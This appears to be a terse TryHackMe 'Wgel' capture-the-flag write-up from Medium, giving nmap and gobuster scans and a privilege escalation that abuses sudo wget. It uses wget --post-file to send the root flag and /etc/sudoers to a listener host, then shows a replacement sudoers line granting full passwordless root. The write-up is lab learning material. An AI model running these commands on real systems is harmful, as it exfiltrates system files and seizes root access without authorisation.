THM — WGEL CTF

  • -sV is the flag for version
  • Pn is a flag to consider all hosts are online
  • -sC is to use the default Nmap scripts
  • -vv is to show the verbose output of Nmap scan results
gobuster dir -u http://10.10.52.93/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
locate *flag.txt
sudo /usr/bin/wget --post-file=<path of file> <Listening IP>
I have sent the content of the root flag using wget
sudo wget --post-file=/etc/sudoers <listener IP>
#jessie ALL=(root) NOPASSWD: /usr/bin/wget
jessie ALL=(ALL) NOPASSWD: ALL

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Adithya Thatipalli

Adithya Thatipalli

Security Engineer by Day, Cloud and Blockchain Learner during Night